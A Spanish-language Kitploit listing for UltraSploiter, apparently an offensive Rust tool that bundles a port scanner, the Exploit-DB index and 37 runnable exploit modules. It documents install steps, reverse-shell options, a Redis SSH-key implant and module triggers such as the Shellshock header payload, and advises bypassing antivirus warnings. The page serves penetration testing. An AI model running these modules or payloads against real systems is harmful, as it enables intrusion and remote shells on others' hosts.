Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitLabGitLab/vqkro/ultrasploiter
Frameworks de Pruebas de PenetraciónReconocimientoEscáneres de VulnerabilidadesFrameworks de ExploitsMapeo de RedesEscaneo de PuertosExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónComando y ControlRed Teaming
10hace 13h 11mAún no revisado
Desarrollo de Payloads
GitLabvqkro/ultrasploiter

ultrasploiter

Un único binario que combina un escáner de puertos, el índice completo de Exploit-DB (47k entradas) y módulos de exploit ejecutables en una sola herramienta. Escrito en Rust, funciona en Linux, Windows y macOS.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

UltraSploiter

escanea, empareja, explota — una IP de entrada, shells de salida.

Un único binario que combina un escáner de puertos, el índice completo de Exploit-DB y un conjunto de módulos de explotación ejecutables en una sola herramienta. Funciona en Linux, Windows y macOS.

tareanormalmenteaquí
Encontrar servicios en un hostnmapUltraSploiter scan <ip>
Buscar exploitssearchsploitUltraSploiter search <kw>
EjecutarlosmsfconsoleUltraSploiter exploit <ip> <module>

Menú de UltraSploiter


Instalación

La forma más simple y mejor es simplemente descargar el binario precompilado y ejecutarlo. Nada que instalar, sin dependencias — un único archivo autocontenido.

Descárgalo desde la página de Releases:

  • Windows — UltraSploiter-windows-x86_64.exe → doble clic
  • Linux — UltraSploiter-linux-x86_64
  • macOS — aún no hay binario precompilado; compílalo con un solo comando (abajo)

Aviso: las herramientas de seguridad son marcadas. Windows SmartScreen y el antivirus probablemente advertirán o pondrán en cuarentena el binario — haz clic en Más información → Ejecutar de todas formas, o añade una exclusión si vas a conservarlo.

Windows

Haz doble clic en UltraSploiter.exe. El menú se abre.

Si SmartScreen advierte sobre un editor desconocido (lo hará, para cualquier binario sin firmar), haz clic en Más información → Ejecutar de todas formas.

Linux

chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64

macOS

chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64

Si Gatekeeper lo bloquea (de nuevo, cualquier binario sin firmar), haz clic derecho → Abrir, o elimina la marca de cuarentena una vez:

xattr -d com.apple.quarantine UltraSploiter-macos-arm64

Compilar desde el código fuente

Solo es necesario si no hay un binario para tu plataforma, o si quieres modificarlo. Se requiere Rust 1.74+.

Linux

sudo apt install build-essential    # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

macOS

xcode-select --install              # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

Windows

git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1                         # -> UltraSploiter.exe

build.ps1 usa el toolchain stable-x86_64-pc-windows-gnu, que enlaza con MinGW — así que no necesitas Visual Studio ni MSVC. Instala ese toolchain si falta. Si ya tienes MSVC Build Tools, un simple cargo build --release también funciona.

Aviso para Windows + GNU: windows-sys (arrastrado por tokio) invoca dlltool, que llama al ensamblador as — y el componente rust-mingw no incluye as. build.ps1 busca un bin de MinGW que lo tenga en %~dp0tools\mingw64\bin y %USERPROFILE%\tools\mingw64\bin, y lo antepone a PATH cuando lo encuentra. Coloca una compilación de winlibs allí si encuentras error calling dlltool. Los toolchains de MSVC no se ven afectados.


Ejecutarlo

Sin argumentos obtienes el menú:

   1)  Scan a target           find open ports and services
   2)  Search exploits         keyword lookup
   3)  List runnable modules
   4)  Run an exploit          pick a target and a module
   5)  Console                 advanced msf-style commands
   0)  Exit

Línea de comandos

UltraSploiter scan 10.0.0.5                      # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4        # range, fast timing
UltraSploiter scan 10.0.0.5 -p -                 # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU                  # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491                          # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb                      # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console

En Linux/macOS, añade el prefijo ./ (p. ej. ./UltraSploiter scan 10.0.0.5).

Flags de escaneo

flagsignificado
-p <spec>top (1000), 80,443, 1-1024, - (todos)
-T0..-T5plantilla de temporización — de más lento/silencioso a más rápido/ruidoso
-sUescaneo de sondeo UDP
-sVdetección de servicio/versión (activada por defecto)
--no-banneromitir la captura de banners
--jsonJSON a stdout
-oX <file>XML estilo nmap

El escáner es asíncrono (tokio): cada nivel -T establece cuántos sockets están en vuelo a la vez (hasta 8000 en -T5), por lo que cubre el top-1000 de nmap en un par de segundos. Cada "abierto" es un handshake TCP completado, así que los resultados son exactos.

Opciones (-o key=value)

claveusado porsignificado
lhost, lportmódulos de rev-shelldirección de callback
rportmódulos websobrescribir el puerto HTTP
pathshellshock, struts, phpunitruta del endpoint
user, passtomcat_managercredenciales del manager
coresolr_rcenombre del core de Solr
filegrafana_lfiarchivo a leer
ssh_pubkeyredis_unauthclave a insertar en authorized_keys
src, dstproftpd_modcopyorigen / destino de la copia
timeouttodostiempo de espera del socket en segundos

Base de datos de exploits

search e info están respaldados por el índice completo de Exploit-DB — más de 47.000 entradas (el mismo conjunto de datos que usa searchsploit), incluido en el binario. Cuando una entrada lleva un CVE que implementa un módulo ejecutable, info enlaza ambos:

$ UltraSploiter info 17491
Exploit-DB 17491
  description  vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
  codes        OSVDB-73573;CVE-2011-2523

  [runnable] vsftpd_234
  UltraSploiter exploit <ip> vsftpd_234

Módulos ejecutables (37)

móduloCVEdisparador
vsftpd_234CVE-2011-2523usuario :) → bind shell root en 6200
unrealircd_backdoorCVE-2010-2075AB; <cmd> sobre IRC
distcc_execCVE-2004-2687argumento del compilador del protocolo DIST
proftpd_modcopyCVE-2015-3306copia de archivo SITE CPFR/CPTO
redis_unauth—CONFIG SET escribe una clave o entrada de cron
shellshockCVE-2014-6271User-Agent: () { :; }; <cmd>
struts2_5638CVE-2017-5638OGNL en Content-Type
tomcat_putCVE-2017-12615PUT de un webshell JSP
tomcat_manager—despliega un WAR vía /manager
elasticsearch_groovyCVE-2015-1427RCE de Groovy en _search
drupalgeddon2CVE-2018-7600callback de render de la Form API
phpunit_evalCVE-2017-9841eval-stdin.php
jenkins_scriptCVE-2019-1003000Groovy en /script sin autenticación
solr_rceCVE-2019-17558plantilla Velocity en stream.body
grafana_lfiCVE-2021-43798lectura de archivo por path traversal de plugin
webmin_backdoorCVE-2019-15107password_change.cgi canaliza un valor a un shell
php_cgi_arg_injectionCVE-2012-1823-d auto_prepend_file vía la cadena de consulta
Descargar herramienta